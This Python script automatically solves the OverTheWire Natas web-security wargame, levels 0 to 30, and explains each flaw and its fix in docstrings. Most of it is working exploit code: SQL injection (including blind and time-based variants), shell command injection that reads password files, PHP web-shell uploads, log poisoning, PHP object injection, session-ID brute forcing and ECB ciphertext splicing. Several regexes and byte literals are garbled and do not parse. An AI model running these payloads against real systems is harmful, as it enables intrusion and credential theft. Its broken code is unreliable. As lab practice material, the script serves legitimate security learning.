  1. #!/usr/bin/env python3
  2.  
  3. import requests
  4. import re
  5. import binascii
  6. import base64
  7. from urllib.parse import quote, unquote
  8. from itertools import cycle
  9. import string
  10.  
  11.  
  12. from phpserialize import serialize, phpobject
  13.  
  14.  
# Alphabet tried, in this order, by the character-at-a-time levels (natas15-17).
CHAR_SET = "".join((string.ascii_letters, string.digits))
# Every natas password is 32 characters; the misspelled name is kept for callers.
PASSWORD_LENGHT = 32
# Upper bound of the session-id range enumerated by natas18/natas19.
COOKIE_LENGTH = 641
  18.  
def natas0(url):
    """Level 0: the password is embedded in the served page itself.

    Lesson: secrets must never ship inside HTML, comments or client assets.
    Returns the 32-character password for the next level.
    """
    pattern = r"The password for natas. is (.{32})"
    body = requests.get(url).text
    found = re.findall(pattern, body)
    return found[0]
  22.  
def natas1(url):
    """Level 1: solved exactly like level 0; delegates to natas0."""
    result = natas0(url)
    return result
  26.  
def natas2(url):
    """Level 2: a credential file is readable under files/ in the web root.

    Mitigation: keep credential stores outside the document root and disable
    directory listing.
    """
    body = requests.get(f"{url}files/users.txt").text
    found = re.findall(r"natas3:(.{32})", body)
    return found[0]
  30.  
def natas3(url):
    """Level 3: robots.txt points at the directory holding the password.

    robots.txt is advice to crawlers, not an access control; a Disallow line
    is served to anyone and only advertises the path.
    """
    session = requests.Session()
    robots = session.get(f"{url}robots.txt").text
    hidden_dir = re.findall(r"Disallow: (.*)", robots)[0]
    users_file = session.get(f"{url}{hidden_dir}users.txt").text
    # File is "user:password"; take the password side without the trailing newline.
    return users_file.split(':')[1].rstrip()
  38.  
def natas4(url):
    """Level 4: access is granted on the Referer header alone.

    Referer is set by the client and therefore attacker-controlled; it must
    never be used as an authorization signal.
    """
    spoofed_headers = {'referer': 'http://natas5.natas.labs.overthewire.org/'}
    session = requests.Session()
    body = session.get(url, headers=spoofed_headers).text
    return re.findall(r"The password for natas. is (.{32})", body)[0]
  44.  
def natas5(url):
    """Level 5: login state is kept in a client-editable `loggedin` cookie.

    Mitigation: keep authentication state server-side (or in a signed,
    tamper-evident token), never in a plain cookie flag.
    """
    session = requests.Session()
    body = session.get(url, cookies={'loggedin': '1'}).text
    return re.findall(r"The password for natas. is (.{32})", body)[0]
  50.  
def natas6(url):
    """Level 6: the secret lives in an include file the server hands out as text.

    Lesson: includes and any file holding secrets belong outside the web root
    (or must be denied by the web server configuration).
    """
    session = requests.Session()
    response = session.get(f"{url}includes/secret.inc")

    # NOTE(review): this regex literal appears garbled by the paste (escaped
    # quotes lost) and does not parse as written; restore it from the original.
    secret = re.findall(r""(.*)"", response.text)[0].rstrip()
    payload = {'submit': 'submit', 'secret': secret}
    response = session.post(url, data=payload)
    return re.findall(r"The password for natas. is (.{32})", response.text)[0]
  60.  
def natas7(url):
    """Level 7: local file inclusion through the unvalidated `page` parameter.

    Mitigation: map `page` to an allow-list of known templates instead of
    joining user input onto a filesystem path.
    """
    response = requests.get(f"{url}?page=../../../../etc/natas_webpass/natas8")
    # NOTE(review): the character class looks garbled by the paste (an
    # unescaped quote and a lost backslash before 'n'); it does not parse as
    # written. The [1] picks the second 32-char run, presumably skipping a
    # non-password match — verify against the original.
    return re.findall(r"([^><{} =:/"n]{32})", response.text)[1]
  65.  
def natas8(url):
    """Level 8: the "encrypted" secret is only a reversible encoding.

    The published source shows the transform (base64, reverse, hex), so it is
    undone here. Lesson: obfuscation is not confidentiality; store a hash of
    the secret and compare server-side instead of shipping the logic.
    """
    session = requests.Session()
    response = session.get(f"{url}index-source.html")

    # NOTE(review): this regex literal appears garbled by the paste (escaped
    # quotes lost) and does not parse as written; restore it from the original.
    secret = re.findall(""(.{32})"", response.text)[1]
    # Undo the encoding in reverse order: unhex, reverse the bytes, base64-decode.
    # NOTE(review): base64.decodestring was removed in Python 3.9; decodebytes
    # is the same function.
    decoded_secret = base64.decodestring(binascii.unhexlify(bytes(secret, 'ascii'))[::-1])
    payload = {'submit': 'submit', 'secret': decoded_secret}
    response = session.post(url, data=payload)
    return re.findall(r"The password for natas. is (.{32})", response.text)[0]
  76.  
def natas9(url):
    """Level 9: OS command injection — `needle` is spliced into a shell command.

    Mitigation: never build a shell string from user input; call the program
    with an argument array (no shell) and validate the search term.
    """
    needle = quote("; cat /etc/natas_webpass/natas10 #")
    response = requests.get(f'{url}?needle={needle}&submit=Search')
    # NOTE(review): the character class looks garbled by the paste (unescaped
    # quote, lost backslash before 'n') and does not parse as written.
    return re.findall(r"([^><{} =:/"n]{32})", response.text)[1]
  82.  
def natas10(url):
    """Level 10: the same command injection with a character deny-list.

    A deny-list of shell metacharacters is not a fix: the search term still
    reaches grep as a pattern plus an extra filename argument. Mitigation:
    argument arrays and an allow-list for the term.
    """
    needle = quote(".* /etc/natas_webpass/natas11 #")
    response = requests.get(f'{url}?needle={needle}&submit=Search')
    # NOTE(review): the character class looks garbled by the paste (unescaped
    # quote, lost backslash before 'n') and does not parse as written.
    return re.findall(r"([^><{} =:/"n]{32})", response.text)[1]
  88.  
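def natas11(url):
    """Level 11: recover the key stream of an XOR-"encrypted" cookie and forge it.

    The `data` cookie is base64(xor(json, key)). Because the plaintext JSON is
    known, xor(cookie, known_json) yields the key stream, which is then used to
    encrypt a modified JSON with showpassword set to "yes".

    Lesson: XOR with a repeating key is not encryption, and an unauthenticated
    cookie can be rewritten by anyone who learns the key; use an AEAD or an
    HMAC over the cookie value.

    Args:
        url: base URL of the level, credentials included.

    Returns:
        The natas12 password as a str.
    """
    # With thnx to @Peilonrayz
    def xor_repeat(value, repeater):
        # XOR `value` against `repeater`, cycling the shorter key as needed.
        return bytes(v ^ r for v, r in zip(value, cycle(repeater)))

    def decode_base64(data):
        # Restore the '=' padding that was stripped from the raw cookie.
        # base64.decodestring was removed in Python 3.9; decodebytes is the
        # same function.
        return base64.decodebytes(data + b'=' * (-len(data) % 4))

    def _repeated_substring(text):
        # All substrings text[i:j] with j < len(text); O(n^2) candidates.
        for i in range(len(text)):
            for j in range(i+1, len(text)):
                yield text[i:j]

    def repeated_substring(text):
        # Longest candidate wins (ties by occurrence count). Since j never
        # reaches len(text), this is text[:-1]: the key stream minus its last byte.
        return max(_repeated_substring(text), key=lambda t: (len(t), text.count(t)))

    break_json = b'{"showpassword":"no","bgcolor":"#ffffff"}'
    gen_json = b'{"showpassword":"yes","bgcolor":"#ffffff"}'

    cookies = requests.get(url).cookies.get_dict()
    # [:-3] drops the trailing URL-encoded padding of the raw cookie value
    # (presumably "%3D"); decode_base64 re-adds proper '=' padding.
    cookie = decode_base64(bytes(cookies['data'][:-3], 'ascii'))
    password = repeated_substring(xor_repeat(cookie, break_json))
    # base64.encodestring was removed in Python 3.9; encodebytes is identical
    # (it also appends a trailing newline, hence the rstrip()).
    new_cookie = base64.encodebytes(xor_repeat(gen_json, password)).rstrip().decode('ascii')

    session = requests.Session()
    response = session.get(url, cookies={'data': new_cookie})
    return re.findall(r"The password for natas12 is (.{32})", response.text)[0]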
  117.  
def natas12(url):
    """Level 12: unrestricted file upload.

    The stored extension comes from the client-supplied `filename` field, so a
    .php upload lands in a served directory and is executed. Mitigation:
    server-side extension/type allow-list, server-chosen names, and an upload
    directory outside the web root or with script execution disabled.
    """
    php_payload = '<? include("/etc/natas_webpass/natas13"); ?>'
    files = {'uploadedfile': ('shell.php', php_payload)}
    form = {'filename': 'shell.php'}

    session = requests.Session()
    upload_page = session.post(url, files=files, data=form).text
    # NOTE(review): "S{10}" looks like a lost backslash (\S{10}); kept as pasted.
    stored_path = re.findall(r"(upload/S{10}.php)", upload_page)[0]
    served = session.get(f"{url}{stored_path}").text
    return served.strip()
  129.  
def natas13(url):
    """Level 13: the upload check only inspects the file's magic bytes.

    Prepending an image signature satisfies the type check while the stored
    extension is still attacker-chosen. Mitigation: decide the extension and
    storage location server-side; content sniffing alone is not a control.
    """
    # NOTE(review): the leading bytes appear garbled by the paste (backslashes
    # lost); the docstring intent is an image magic-byte prefix. Kept as pasted.
    body = b'xFFxD8xFFxE0<? include("/etc/natas_webpass/natas14"); ?>'
    files = {'uploadedfile': ('shell.php', body)}
    form = {'filename': 'shell.php'}

    session = requests.Session()
    upload_page = session.post(url, files=files, data=form).text
    # NOTE(review): "S{10}" looks like a lost backslash (\S{10}); kept as pasted.
    stored_path = re.findall(r"(upload/S{10}.php)", upload_page)[0]
    served = session.get(f"{url}{stored_path}").text
    # Skip the four prefix bytes echoed ahead of the included content.
    return served.strip()[4:]
  141.  
def natas14(url):
    """Level 14: classic SQL injection in the login form.

    The password is concatenated into the query, so a quoted `OR "1"="1`
    tautology bypasses authentication. Mitigation: parameterised queries.
    """
    user_param = quote('test')
    pass_param = quote('lol" OR "1"="1')
    body = requests.post(f'{url}?username={user_param}&password={pass_param}').text
    return re.findall(r"The password for natas15 is (.{32})", body)[0]
  148.  
def natas15(url):
    """Level 15: blind (boolean) SQL injection, one character per round.

    The page only says whether a user exists, but an injected
    `LIKE BINARY '<prefix>%'` test turns that yes/no into an oracle for each
    successive password character. Mitigation: parameterised queries and
    uniform responses.
    """
    session = requests.Session()
    known = ''
    for _ in range(PASSWORD_LENGHT):
        for candidate in CHAR_SET:
            probe = f'{url}?username=natas16" AND password LIKE BINARY "{known}{candidate}%'
            if 'This user exists.' in session.get(probe).text:
                known += candidate
                break
    return known
  161.  
def natas16(url):
    """Level 16: command substitution inside a quoted shell argument.

    Double quotes do not stop `$(...)`, so the search term still reaches the
    shell; whether the marker word appears in the output is a one-bit oracle
    per password character. Mitigation: no shell at all — exec with an
    argument array and an allow-listed term.
    """
    session = requests.Session()
    known = ''
    for _ in range(PASSWORD_LENGHT):
        for candidate in CHAR_SET:
            probe = f'{url}?needle=lol$(grep ^{known}{candidate} /etc/natas_webpass/natas17)'
            # A hit makes grep emit output, which removes the marker from the result.
            if 'lol' not in session.get(probe).text:
                known += candidate
                break
    return known
  174.  
def natas17(url):
    """Level 17: time-based blind SQL injection.

    The response body reveals nothing, so `IF(..., sleep(1), NULL)` turns each
    prefix guess into a measurable delay. Mitigation: parameterised queries;
    the timing side channel cannot be masked otherwise.
    """
    session = requests.Session()
    known = ''
    for _ in range(PASSWORD_LENGHT):
        for candidate in CHAR_SET:
            probe = f'{url}?username=natas18" AND IF(password LIKE BINARY "{known}{candidate}%", sleep(1), NULL) %23'
            elapsed = session.get(probe).elapsed.total_seconds()
            # Threshold is half the injected sleep; on a slow link it may need
            # raising (original author's caveat).
            if elapsed >= .5:
                known += candidate
                break
    return known
  189.  
def natas18(url):
    """Level 18: session ids are small sequential integers.

    Enumerating PHPSESSID values finds the admin's live session. Mitigation:
    high-entropy random session identifiers (the PHP default), short session
    lifetimes, and binding sessions to additional context.
    Returns the password, or None if no admin session is found in range.
    """
    session = requests.Session()
    for sid in range(1, COOKIE_LENGTH):
        body = session.get(url, cookies={'PHPSESSID': str(sid)}).text
        if 'You are an admin.' in body:
            line = re.findall(r'Password: [^<]*', body)[0]
            return line.split(': ')[1]
  197.  
def natas19(url):
    """Level 19: the session id is hex("<n>-<user>"), which is still predictable.

    Encoding a guessable value does not add entropy. Mitigation as for level 18.
    Returns the password, or None if no admin session is found in range.
    """
    session = requests.Session()
    for sid in range(1, COOKIE_LENGTH):
        hexed = f"{sid}-admin".encode('ascii').hex()
        body = session.get(url, cookies={'PHPSESSID': hexed}).text
        if 'You are an admin' in body:
            return re.findall(r'Password: [^<]*', body)[0].split(': ')[1]
  206.  
def natas20(url):
    """Level 20: session-data injection through a newline in `name`.

    The server stores session fields as lines in a flat file, so a name
    containing a line break adds an attacker-controlled key/value line.
    Mitigation: use a proper session serializer and validate field values.
    """
    # NOTE(review): the literal appears garbled by the paste; the technique
    # implies a newline between the two "admin" tokens. Kept as pasted.
    forged_name = quote("adminnadmin 1")
    session = requests.Session()
    session.post(f"{url}?name={forged_name}", cookies={'hack': 'hack'})
    cookie = session.cookies.get_dict()
    body = session.get(f"{url}", cookies=cookie).text
    return re.findall(r'Password: [^<]*', body)[0].split(': ')[1]
  215.  
def natas21(url):
    """Level 21: two hosts share one session store.

    A form on the "experimenter" host writes arbitrary keys (here `admin`) into
    the shared session, which the main host then trusts. Mitigation: do not
    share sessions across trust boundaries, and allow-list the session keys a
    form may set.
    """
    credentials, _, _ = url.partition('@')
    experimenter_url = f"{credentials}@natas21-experimenter.natas.labs.overthewire.org/"
    session = requests.Session()
    cookie = session.get(url).cookies.get_dict()
    form = dict(align='lol', fontsize='100%', bgcolor='yellow', submit='Update', admin='1')
    session.post(experimenter_url, data=form, cookies=cookie)
    body = session.get(url, cookies=cookie).text
    return re.findall(r"Password: [^<]*", body)[0].split(': ')[1]
  225.  
def natas22(url):
    """Level 22: the page redirects but still renders the protected content.

    A client that does not follow the redirect reads the body. Mitigation:
    stop processing (exit) right after emitting the Location header.
    """
    response = requests.get(f"{url}?revelio=harrypotter", allow_redirects=False)
    line = re.findall(r"Password: [^<]*", response.text)[0]
    return line.split(': ')[1]
  230.  
def natas23(url):
    """Level 23: PHP loose comparison — a string with a numeric prefix passes
    the integer check while also satisfying the substring check.

    Mitigation: strict comparisons and a single, well-defined credential check.
    """
    response = requests.get(f"{url}?passwd=11iloveyou")
    line = re.findall(r"Password: [^<]*", response.text)[0]
    return line.split(': ')[1]
  235.  
def natas24(url):
    """Level 24: type confusion — `passwd[]` turns the parameter into an array.

    The string comparison then presumably fails in a way that is treated as a
    match. Mitigation: validate the parameter type before comparing.
    """
    response = requests.get(f"{url}?passwd[]=11iloveyou")
    line = re.findall(r"Password: [^<]*", response.text)[0]
    return line.split(': ')[1]
  240.  
def natas25(url):
    """Level 25: path traversal in `lang` combined with log injection.

    The `....//` payload suggests the traversal filter strips `../` only once,
    and the User-Agent is written unescaped into a per-session log that the
    page then includes. Mitigation: canonicalise and allow-list paths; never
    include log files as code; encode log entries.
    """
    session = requests.Session()
    session.headers.update({'User-Agent': '<? readfile("/etc/natas_webpass/natas26") ?>'})
    cookie = session.get(url).cookies.get_dict()
    log_path = f"....//logs/natas25_{cookie['PHPSESSID']}.log"
    body = session.get(f"{url}?lang={log_path}", cookies=cookie).text
    # The password follows the "] " that closes the log line's bracketed prefix.
    return re.findall(r"] (.{32})", body)[0]
  249.  
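def natas26(url):
    """Level 26: PHP object injection via an unserialize()d cookie.

    The `drawing` cookie carries a base64-encoded PHP-serialized value that the
    server unserializes, so a crafted Logger object is instantiated with
    attacker-chosen properties (OWASP: deserialization of untrusted data).
    Mitigation: never unserialize() client-supplied data; use JSON for cookie
    payloads and sign or MAC them.
    """
    class Logger():
        # Mirror of the server-side class; the three fields become PHP properties.
        def __init__(self,initMsg,exitMsg,logFile):
            self.initMsg = initMsg
            self.exitMsg = exitMsg
            self.logFile = logFile

    def object_hook(obj):
        # Tells phpserialize how to encode a Logger; other objects fall through to None.
        # NOTE(review): these property-name literals appear garbled by the paste
        # (PHP private names are NUL-delimited, "\0Class\0name"); verify against
        # the original before relying on them.
        if isinstance(obj, Logger):
            return phpobject('Logger', {b'x00Loggerx00initMsg': obj.initMsg, b'x00Loggerx00exitMsg': obj.exitMsg, b'x00Loggerx00logFile': obj.logFile})

    session = requests.Session()
    logger = Logger("", "<?php include('/etc/natas_webpass/natas27');?>", "img/code.php")
    # base64.encodestring was removed in Python 3.9; encodebytes is the same
    # function (and likewise inserts a newline every 76 output characters).
    # NOTE(review): .replace(b'n', b'') removes the letter 'n', which corrupts
    # the base64 text; the intent was most likely the inserted newlines
    # (b'\n'). Kept as pasted.
    new_ser = base64.encodebytes(serialize(logger, object_hook=object_hook)).replace(b'n', b'').decode('ascii')
    cookie = dict(drawing=new_ser)
    # First request makes the server unserialize the cookie and write the file.
    session.get(f"{url}", cookies=cookie)
    response = session.get(f"{url}img/code.php")
    return re.findall(r"(.{32})", response.text)[0]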
  269.  
def natas27(url):
    """Level 27: a second "natas28" row is created through column truncation.

    The padded username appears to rely on the database trimming/truncating
    the value on insert so it collides with the real account on lookup.
    Mitigation: validate length before insert, enforce unique constraints in
    strict SQL mode, and compare the stored value rather than the submitted one.
    """
    session = requests.Session()
    padded_user = 'natas28' + ' ' * 60 + 'hackz'
    session.post(url, data=dict(username=padded_user, password=''))
    body = session.post(url, data=dict(username='natas28', password='')).text
    return re.findall(r"[password] => (.{32})", body)[0]
  278.  
def natas28(url):
    """Level 28: splice attacker-chosen ciphertext blocks into an encrypted query token.

    The server encrypts the search string and accepts the ciphertext back as
    the `query` parameter. Identical plaintext blocks yield identical
    ciphertext blocks (see the block comparison in _prefix_size), so the
    ciphertext of an SQL fragment can be cut out of one token and pasted into
    another. Lesson: an unauthenticated deterministic block cipher mode lets
    tokens be rearranged; authenticate tokens (AEAD/HMAC) and keep the query
    parameterised server-side.
    """
    session = requests.Session()
    # Submit a plaintext and return the ciphertext the server echoes back in
    # the redirect URL's `query` parameter.
    cipher_text = lambda url, plain_text:base64.b64decode(unquote(session.post(url, data={"query":plain_text}).url.split("query=")[1]))

    def _block_size(url):
        # Grow the plaintext one byte at a time until the ciphertext grows;
        # the size of that jump is the cipher's block size.
        ciphertext = cipher_text(url, '')
        pre_len = len(ciphertext)
        idx = 0

        while pre_len >= len(ciphertext):
            plaintext = 'a' * idx
            ciphertext = cipher_text(url, plaintext)
            idx += 1

        return len(ciphertext) - pre_len

    def _prefix_size(url):
        # Returns (block_size, alignment bytes needed before our text starts on
        # a block boundary, byte offset of that aligned block in the ciphertext).
        block_size = _block_size(url)
        plain_text = 'a' * block_size * 3
        cypher = cipher_text(url, plain_text)
        cipher_a = ""

        # Two adjacent equal ciphertext blocks: the encryption of a full block of 'a'.
        for i in range(0, len(cypher), block_size):
            if cypher[i:i+block_size] == cypher[i+block_size: i+block_size*2]:
                cipher_a = cypher[i: i+block_size]
                break

        # Smallest extra 'a' count that still produces that block tells how
        # many bytes are needed to finish the server's own prefix block.
        for i in range(block_size):
            plain_text = 'a' * (i + block_size)
            cypher = cipher_text(url, plain_text)
            if cipher_a in cypher:
                return block_size, i, cypher.index(cipher_a)
        # NOTE(review): returns None if no match; the tuple unpack below then raises TypeError.

    block_size, index, cypher_size = _prefix_size(url)
    # Baseline token whose blocks before/after `cypher_size` are reused as-is.
    plain_text = 'a'* (block_size // 2)
    cypher = cipher_text(url, plain_text)

    sql = " UNION ALL SELECT concat(username, 0x3A ,password) FROM users #"
    # Align the SQL to a block boundary and pad it out to whole blocks.
    pt = 'a' * index + sql + 'b' * (block_size - (len(sql) % block_size))
    ct = cipher_text(url, pt)
    # Ciphertext blocks that cover exactly the SQL fragment.
    e_sql = ct[cypher_size:cypher_size-index+len(pt)]
    response = session.get(f"{url}search.php/?query=", params={"query": base64.b64encode(cypher[:cypher_size]+e_sql+cypher[cypher_size:])})
    return re.findall(r"<li>natas29:(.{32})</li>", response.text)[0]
  323.  
def natas29(url):
    """Level 29: command injection through Perl's file handling.

    The leading '|' in the payload suggests a two-argument open(), where a
    pipe character makes the rest of the value a shell command. Mitigation:
    three-argument open() and an allow-list for the `file` parameter.
    """
    session = requests.Session()
    # NOTE(review): "%27n%27" likely lost a backslash in the paste (a newline
    # argument to tr); kept as pasted.
    payload = "|cat+%22/etc/nat%22%22as_webpass/nat%22%22as30%22|tr+%27n%27+%27+%27"
    response = session.get(f"{url}index.pl?file={payload}")
    # NOTE(review): the character class looks garbled by the paste (unescaped
    # quote, lost backslash before 'n') and does not parse as written.
    return re.findall(r"([^><{} =:/"n]{32})", response.text)[1]
  330.  
def natas30(url):
    """Level 30: Perl DBI quote(param(...)) with a multi-valued parameter.

    Sending `password` twice presumably lets the second value reach quote()'s
    type argument, so the first value is interpolated unquoted. Mitigation:
    placeholders/bind parameters, and read a single scalar from param().
    """
    form = {"username": "natas31", "password": ["'lol' or 1", 4]}
    body = requests.post(url, data=form).text
    return re.findall(r"natas31(.{32})", body)[0]
  336.  
def natas31(url):
    """Level 31 onwards is intentionally left unsolved; prints the author's note.

    Returns None.
    """
    note = (
        "This is where I stop\n"
        "Found it is not nice to post solutions online.\n"
        "All of the above where online in some from"
    )
    print(note)
  342.  
  343. # Main functions
def next_level(user, password):
    """Build the level URL with HTTP basic credentials embedded.

    Fine for this lab; in general, credentials in URLs leak into proxy logs,
    browser history and Referer headers.
    """
    host = f"{user}.natas.labs.overthewire.org"
    return "http://{}:{}@{}/".format(user, password, host)
  346.  
def next_user(user):
    """Return the next level's account name, e.g. 'natas5' -> 'natas6'.

    The digits in `user` are collected, incremented as one number, and
    substituted back into the name.
    """
    digits = "".join(ch for ch in user if ch.isdigit())
    bumped = str(int(digits) + 1)
    return user.replace(digits, bumped)
  350.  
if __name__ == '__main__':
    # Starting point: level 0 uses the published natas0/natas0 credentials.
    username = 'natas0'
    password = 'natas0'

    # Function dispenser: host part of each level URL -> solver for that level.
    solvers = [
        natas0, natas1, natas2, natas3, natas4, natas5, natas6, natas7,
        natas8, natas9, natas10, natas11, natas12, natas13, natas14, natas15,
        natas16, natas17, natas18, natas19, natas20, natas21, natas22, natas23,
        natas24, natas25, natas26, natas27, natas28, natas29, natas30, natas31,
    ]
    dispenser = {
        f"{solver.__name__}.natas.labs.overthewire.org/": solver
        for solver in solvers
    }

    # Each solver returns the next level's password; stop at the first login failure.
    for _ in range(len(dispenser)):
        url = next_level(username, password)
        if requests.head(url).status_code != requests.codes.ok:
            print(f"[!] Failed {username}: {password}")
            break
        print(f"[!] Logged into {username}: {url}")
        solve = dispenser[url.split("@")[1]]
        password = solve(url)
        username = next_user(username)